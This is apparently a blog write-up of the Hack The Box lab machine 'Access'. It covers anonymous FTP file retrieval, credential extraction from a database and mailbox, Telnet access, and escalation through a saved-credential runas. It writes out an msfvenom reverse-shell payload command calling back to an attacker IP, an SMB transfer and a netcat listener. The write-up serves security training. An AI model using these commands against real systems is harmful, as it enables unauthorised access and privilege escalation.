Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
Per the usual, we’ll start with our standard nMap scan: nmap -A -p – 10.10.10.98
data:image/s3,"s3://crabby-images/1a6f9/1a6f9fd0b5fea6e119abad86e7ec3bc3f730393f" alt=""
So port 80 is open, let’s check out the webpage:
data:image/s3,"s3://crabby-images/071bb/071bb5b8ed2987408f8c0c014fb3809b96c9b5f9" alt=""
Nothing too exciting. I also see that port 21 is open with Anonymous FTP login, so let’s try that: ftp 10.10.10.98
data:image/s3,"s3://crabby-images/98c03/98c033f623e992e2f2e965e463ee3e92d45b1f47" alt=""
Navigating to the Backups directory, there is a backup.mdb file, so let’s get that: get backup.mdb
data:image/s3,"s3://crabby-images/143ce/143ce8981a16913065fffe6baea00efc9a436e39" alt=""
There is also a Access Control.zip file in the Engineer directory, so let’s get that too: get “Access Control.zip”
data:image/s3,"s3://crabby-images/fc8da/fc8da1444fb5fc26587bdf8df01941a4a9e664e1" alt=""
And then we notice something interesting when we transfer the files. They both present a WARNING! error that the files were received in ASCII mode. This could be problematic (and was) when I tried to open the files because they displayed as corrupted. We can type binary in our FTP window to switch our transfer mode to binary.
data:image/s3,"s3://crabby-images/4eb65/4eb6533e73f02b6be4acd3d5ab7547907057c9b2" alt=""
It looks like .mdb is a Microsoft Access database. I ran the command apt search mdb to see what packages I could potentially install that might let me view a mdb file and saw mdbtools, so I installed that with apt-get install mdbtools.
Now, when we do mdb-tables backup.mdb we can see the tables within this database:
data:image/s3,"s3://crabby-images/ee320/ee320f08e1a662471b89de5d88b84ea3325674e8" alt=""
I’m gonna go an easy route right now and use the website www.mdbopener.com. Obviously if this was a potentially sensitive database we wouldn’t want to do this. However, since this is HTB, I’m ok with it. When we open our database we see a bunch of information in a much easier to view format:
data:image/s3,"s3://crabby-images/1f763/1f76380276b01d2d69feca10d6f0c4f35fdb31fc" alt=""
When we look at the auth user table, we can see three entries:
data:image/s3,"s3://crabby-images/804b0/804b0afae981132165ac0d31b19e9a4fca7afa88" alt=""
Cool! I also know that when I tried to open up the .zip file downloaded earlier it’s password protected. Let’s try some of these credentials:
data:image/s3,"s3://crabby-images/9aa56/9aa56b2217033883201260214836cac4184885d0" alt=""
The GUI extractor was being dumb so I tried the command line one: 7z x “Access Control.zip” and entered access4u@security as the password.
data:image/s3,"s3://crabby-images/b75b1/b75b1cc51002da2fbc3b71065436931927683e68" alt=""
And we’re presented with a .pst file, which is an Outlook e-mail archive/profile. I had to install pst-utils first with apt-get install pst-utils After installation, I was able to run the command readpst ‘Access Controls.pst’ and was presented with the mailbox itself.
data:image/s3,"s3://crabby-images/ef601/ef6010eefc67c2ca8956b233e445d320a476a13b" alt=""
We can then use cat to view the contents of the mailbox, and we’re presnted with a username and a password:
data:image/s3,"s3://crabby-images/a5f4e/a5f4e7533ee16ea65d2d709612f165ce3253b851" alt=""
Shell
We can use Telnet to get into the box easily enough:
data:image/s3,"s3://crabby-images/512d8/512d838ae3440f04e42c36a252833bc6cb15d9df" alt=""
Once on the machine I ran systeminfo and saved the associated data in a new file on my Kali box:
data:image/s3,"s3://crabby-images/821a0/821a09c68c04c4af13399fac74881940cdb1b5dc" alt=""
From here, we’ll use Windows Exploit Suggester to see if there’s any vulnerabilities that stand out. First I’ll navigate to where I have WES saved and then we’ll update the database: ./windows-exploit-suggester.py –update
data:image/s3,"s3://crabby-images/588ae/588aece4044b7da097861cff8df2c149f97f13de" alt=""
Next, we’ll compare this newly updated database with the systeminfo file from our target machine: ./windows-exploit-suggester.py –database 2020-08-25-mssb.xls –systeminfo ../../Access/systeminfo.txt
data:image/s3,"s3://crabby-images/14192/14192fa8d64100e5aff724fd317bdc761af3a202" alt=""
Looking at these, there are some critical vulnerabilities but nothing for remote code execution, priv esc, etc. So let’s move forward.
After moving to C:\Users\Public\Desktop there is a .lnk file stored here. So let’s type it:
data:image/s3,"s3://crabby-images/e458d/e458ddf41254b89913966d6e2be92d462c3b76a4" alt=""
There are two commands in here worth investigating: runas and savecred:
data:image/s3,"s3://crabby-images/2825f/2825f3c1cb9f25547409c4ef3f82c4e4b35d4908" alt=""
RunAs allows a user to run a command as another user, and /savecred saves the password so that it only has to be entered the first time RunAs is used. From dummies.com:
data:image/s3,"s3://crabby-images/cdcf1/cdcf12f227e6c023a2ed328e7cf8db0b80df900e" alt=""
Now, we could use RunAs to view the root flag, but that’s no fun. Let’s create a reverse shell. Let’s use msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe > shell.exe
If you need a refresher or a cheat sheet, I found this handy one: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
data:image/s3,"s3://crabby-images/49d9f/49d9f46150bc67fe4cfd4bb8e9f9933c653bfdfb" alt=""
Next, we need to get our shell.exe over to our target machine. To do this we’ll setup our Impacket SMBServer: impacket-smbserver smb smb (don’t forget to be in the directory above the directory you want to share.
data:image/s3,"s3://crabby-images/a3f66/a3f660703fb78689e5cc371edca22788ac10c93f" alt=""
Next, from our Telnet/Shell we want to add this SMB share as an accessible location from our Windows box: net use \\10.10.14.8\smb
data:image/s3,"s3://crabby-images/dbb74/dbb74cab221a0666644f2f776b9c35ab50071338" alt=""
Now let’s copy over our shell: copy \\10.10.14.8\smb\shell.exe
data:image/s3,"s3://crabby-images/39df6/39df6086fad9a2e91b99d283c5cc421a4c183b22" alt=""
Access Denied….which means I can’t write to the directory I’m in. So let’s move to C:\temp and try again:
data:image/s3,"s3://crabby-images/4e005/4e005001196505fe7a28020cb773197b058f11f1" alt=""
Now we can use our RunAs command in conjunction with savecred: runas /user:Access\Administrator /savecred “C:\temp\shell.exe” But first we need to start our NetCat listener to catch our reverse shell:
data:image/s3,"s3://crabby-images/3d6d0/3d6d078b628bb5a06ceeb2106f2a13c01a3ea7ba" alt=""
And then run our command:
data:image/s3,"s3://crabby-images/eb030/eb030b841e4e5b39280bfdd08528cde051102005" alt=""
data:image/s3,"s3://crabby-images/1b65b/1b65b08e91c2d554dee654875482e868c1001f10" alt=""